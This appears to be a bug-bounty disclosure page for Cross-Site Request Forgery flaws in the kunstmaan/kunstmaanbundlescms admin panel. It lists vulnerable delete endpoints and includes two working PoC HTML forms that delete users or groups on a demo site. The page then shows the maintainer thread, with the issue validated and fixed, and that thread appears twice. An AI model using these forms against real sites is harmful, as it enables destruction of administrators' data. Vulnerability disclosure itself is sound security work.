Cross-Site Request Forgery (CSRF) in kunstmaan/kunstmaanbundlescms

Valid

Reported on

Oct 17th 2021

Description

There is exist multiple high impact CSRF that attacker can delete many part of applications contents.

I provide the full list of CSRFs vulnerable endpoints for you.

(because the number of endpoints are too many I don't put the PoC.html of all of the vulnerable endpoints)

Occurrences

PagePartAdmin.php L1-L387

delete any page

Tag.php L1-L21

delete any blog tag

Author.php L1-L19

delete any blog author

Bike.php L1-L171

Delete any Bike

RulesAdminListController.php L1-L84

delete any rule

User.php L1-L22

delete any user

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.bundles.kunstmaan.be/en/admin/settings/users/{id} /delete">
      <input type="hidden" name="delete" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

replace {id} with user id

DuplicateSubPageInterface.php L1-L8

Duplicate any blog page

RedirectRouter.php L1-L219

delete any route

GroupsController.php L1-L168

delete any group

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.bundles.kunstmaan.be/en/admin/settings/groups/{id}/delete?delete=">
      <input type="hidden" name="delete" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

replace {id} with groups id

Category.php L1-L21

delete any blog category

We have contacted a member of the kunstmaan/kunstmaanbundlescms team and are waiting to hear back 2 years ago

commented 2 years ago

Researcher

This CSRFs have a can make high impact damage to admin panel, please don't reduce the bounty amount.

thanks so much.

A kunstmaan/kunstmaanbundlescms maintainer

commented 2 years ago

Hi @amammad, thanks for the report!

@admin should I mark this issue as valid or not? The "base issue" was already reported in a separate vulnarability report and that one was marked as valid. The difference is that this report lists more locations that can exploited this security issue.

commented 2 years ago

Admin

If you believe the new occurrences, i.e. permalinks point to unaddressed points of failure, feel free to mark this report as valid, yes.

commented 2 years ago

Researcher

Hey @maintainer

just tell me to remove the repetitive endpoints

commented 2 years ago

Researcher

@maintainer I found All vulnerable endpoint carefully to aware you of all occurrences

please if there isn't any problem, just validate my report too.

best regards.

A kunstmaan/kunstmaanbundlescms maintainer validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

A kunstmaan/kunstmaanbundlescms maintainer marked this as fixed with commit 4f5612 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Author.php#L1-L19 has been validated

Category.php#L1-L21 has been validated

RulesAdminListController.php#L1-L84 has been validated

Tag.php#L1-L21 has been validated

RedirectRouter.php#L1-L219 has been validated

User.php#L1-L22 has been validated

DuplicateSubPageInterface.php#L1-L8 has been validated

GroupsController.php#L1-L168 has been validated

PagePartAdmin.php#L1-L387 has been validated

Bike.php#L1-L171 has been validated

to join this conversation

We have contacted a member of the kunstmaan/kunstmaanbundlescms team and are waiting to hear back 2 years ago

commented 2 years ago

Researcher

This CSRFs have a can make high impact damage to admin panel, please don't reduce the bounty amount.

thanks so much.

A kunstmaan/kunstmaanbundlescms maintainer

commented 2 years ago

Hi @amammad, thanks for the report!

@admin should I mark this issue as valid or not? The "base issue" was already reported in a separate vulnarability report and that one was marked as valid. The difference is that this report lists more locations that can exploited this security issue.

commented 2 years ago

Admin

If you believe the new occurrences, i.e. permalinks point to unaddressed points of failure, feel free to mark this report as valid, yes.

commented 2 years ago

Researcher

Hey @maintainer

just tell me to remove the repetitive endpoints

commented 2 years ago

Researcher

@maintainer I found All vulnerable endpoint carefully to aware you of all occurrences

please if there isn't any problem, just validate my report too.

best regards.

A kunstmaan/kunstmaanbundlescms maintainer validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

A kunstmaan/kunstmaanbundlescms maintainer marked this as fixed with commit 4f5612 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Author.php#L1-L19 has been validated

Category.php#L1-L21 has been validated

RulesAdminListController.php#L1-L84 has been validated

Tag.php#L1-L21 has been validated

RedirectRouter.php#L1-L219 has been validated

User.php#L1-L22 has been validated

DuplicateSubPageInterface.php#L1-L8 has been validated

GroupsController.php#L1-L168 has been validated

PagePartAdmin.php#L1-L387 has been validated

Bike.php#L1-L171 has been validated

to join this conversation